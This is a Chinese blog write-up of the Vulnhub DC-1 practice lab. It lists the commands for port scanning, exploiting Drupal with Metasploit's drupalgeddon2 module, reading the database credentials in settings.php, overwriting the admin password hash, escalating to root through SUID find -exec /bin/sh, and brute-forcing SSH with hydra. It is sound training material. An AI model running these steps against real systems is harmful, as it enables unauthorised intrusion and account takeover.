Vulnhub靶场DC-1

于 2024-08-21 15:30:12 发布
阅读量776 收藏 12
点赞数 22
文章标签: web安全 网络安全 安全 linux 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_69781315/article/details/141392690
版权

下载

靶场下载地址:https://www.vulnhub.com/entry/dc-1,292/

解压完后使用vmware打开.ova文件

配置

设置网络适配器为NAT模式

测试靶场

1.kali探测ip

arp-scan -l

2.对靶机ip进行扫描

nmap -A 192.168.190.240 -p 1-65535

发现开放了22算口,开放了ssh服务,OpenSSH 6.0p1  
发现开放了80端口,存在web服务,Apache httpd 2.2.22,Drupal 7  
发现开放了111端口,开放了rpcbind服务
访问站点

发现是一个电信的drupal服务,根据nmap结果可知当前运行的是Drupal 7的CMS
利用MSF

3.msf

search drupal

选择模块进行测试

use exploit/unix/webapp/drupal_drupalgeddon2

设置ip

启动msf

4.getshell

发现是www-data权限
使用python反弹一个交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

Drupal的默认配置文件为
/var/www/sites/default/settings.php

cat /var/www/sites/default/settings.php

发现了flag2和数据库的账号密码

flag2提示,提升权限为root来查看敏感文件,或者直接爆破

5.连接数据库

进入数据库

mysql -u dbuser -p

查看数据库,切换到drupaldb数据库

查看查找默认的Drupal user 表

select * from users;

进入www目录

置换drupal密码

php scripts/password-hash.sh admin

然后在进入数据库中把密码字段进行替换  
进入mysql,输入密码,切换到drupaldb数据库
将pass字段进行替换

update users set pass="$S$DW/j0Hhhx6pIBV4ZkoBp3mv/5l8reTwEBdpgzB/x8awTYUfFkd2k" where name="admin";

6.提权

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
大致意思是提权并提示 -exec,想到suid提权 find 命令

find / -perm -4000 2>/dev/null

使用命令查看 suid 权限的可执行二进制程序

使用命令测试,发现为root权限

touch 666
ls
find / -name 666 -exec "whoami" \;

我们切换语句进入shell,执行whoami查看当前权限,执行ls查看当前目录下文件,切换到root目录,查看文件,发现cat thefinalflag.txt文件。

find / -name 666 -exec "/bin/sh" \;   
whoami
ls
cd /root
ls

此时我们查看 /etc/passwd 文件,发现存在 flag4 用户,我们也可以使用 hydra 进行爆破

hydra -l flag4 -P /root/Desktop/pass.txt ssh://192.168.xxx.xxx

SSH连接登录,拿到flag4权限

根据提示需要得到root权限才能得到falg。
liunx提权一般有四种提权方式:
sudo提权,通过命令sudo -l查看是否有可提权的命令。
suid提权,通过命令find / -user root -perm -4000 -print 2>/dev/null查看是否具有root权限的命令
系统版本内核提权。
通过数据库提权。

发现_find_具有root权限
直接执行命令
进行提权

7.成功获取flag

柠檬味、气泡水
关注
  • 22
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vulnhub靶场实战系列-DC-3实战
05-20
vulnhub靶场实战系列-DC-3实战
Vulnhub-DC-1实战靶场
ierciyuan的博客
10-12 2535
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag。
Vulnhub靶场练习 DC-1
m0_64227134的博客
04-23 533
Vulnhub 靶场练习 DC-1
vulnhub靶场 DC-1靶机 渗透详细过程
黑战士的博客
07-26 1019
1.扫描局域网主机netdiscover用法2.开放端口扫描2.MSF使用3.hydra爆破:sudo hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.0.100hydra+John密码包以上两种方式可以爆出flag4的密码4.suid提权:Linux下用SUID提权、find命令exec。
Vulnhub靶场----9、DC-9
七天
03-03 770
Vulnhub-DC9
Vulnhub - DC-1
qq_46081990的博客
03-14 387
Nmap扫描目标主机,发现开放22、80、111、40884端口,分别运行OpenSSH 6.0p1、Apache httpd 2.2.22、rpcbind 2-4服务。MSF搜索Drupal,使用payload:exploit/unix/webapp/drupal_drupalgeddon2,成功拿到Web权限www-data。查询GTFOBins得知find的SUID提权方式如下,启用一个新的root权限的bash。上传综合辅助探测脚本LinEnum.sh至目标主机/tmp目录下,给予执行权限执行。
vulnhub靶场DC-1 思路详解
weixin_62369433的博客
09-24 493
快速入门学习vulnhub靶场
vulnhub靶场DC-3
qq_58091216的博客
01-08 1298
如果您的网站正在运行 Joomla,您可以对您的网站使用 JoomScan 实用程序来发现漏洞或仅提供有助于攻击您网站的一般信息。漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。与以前的 DC 版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有任何线索。Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。我们可以看到用户名爆破出来了,密码是加密的,我们进行解密。
vulnhub靶场 DC-1
trytowritecode的博客
03-10 4367
过程曲曲折折,中途还看了下题解才断断续续的完成这个靶场。只能说技术不到家。 攻击机:kali ip:192.168.16.134 靶场 : ip:192.168.16.149 首先是到vulnhub官网去下载DC-1的靶场这里就不讲如何下载了,直接开始靶场全过程。 首先确认自己的目标 拿到root用户权限这里网络适配器选择NAT模式,这样会和主机在同一个网段中少浪费一些时间。 启动靶机,然后会是一个登录界面不知道账号密码所以就放在这打开. 启动我们的kali,nmap一下网段我这里是 nma
vulnhub靶场DC-1
qq_34942239的博客
01-26 738
perm -4000: 指定查找具有 Setuid 位(SUID)设置的文件。SUID 位是一种权限位,当文件被设置了 SUID 位时,它将在执行时获得与所有者相同的权限。这里的 -4000 表示查找具有 SUID 位设置的文件。搜索suid程序:find / -user root -perm -4000 -print 2>/dev/null。不过flag1 和flag2应该就在未提权的目录里面,这个好找,下次一步步找,不要越步。-user root: 指定查找的文件所有者是 root 用户。
vulnhub靶场实战:DC-1
huangyongkang666的博客
04-18 4500
vulnhub实战:DC-1 1.DC-1介绍 DC-1是一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。 它旨在为初学者带来挑战,但它的容易程度将取决于您的技能和知识以及您的学习能力。 要成功完成此挑战,您将需要Linux技能,熟悉Linux命令行以及具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。 有多种方法可以获得root,但是,我包含了一些包含初学者线索的标志。 总共有五个flag,但最终目标是在root的主目录中找到并读取
vulnhub靶场实战系列-DC-1实战流程图
05-17
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
怎么在网络攻击中屹立不倒
dexun123的博客
08-12 1135
在当今蓬勃发展的网络游戏产业中,服务器安全无疑是企业生存与发展的基石。面对互联网环境中无处不在的DDoS(分布式拒绝服务)与CC(挑战碰撞)攻击威胁,游戏服务器的防御能力与高效处理能力显得尤为重要。相较于追求综合性能平衡的普通服务器,游戏服务器必须专注于构建坚不可摧的安全防线与流畅无阻的游戏体验,以抵御外部侵扰,确保玩家沉浸于无缝的游戏世界。
网络安全(黑客)自学
白帽子凯哥聊黑客
08-20 469
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全(黑客)——自学2024
最新发布
2401_84466325的博客
08-21 828
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
08-18 1536
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值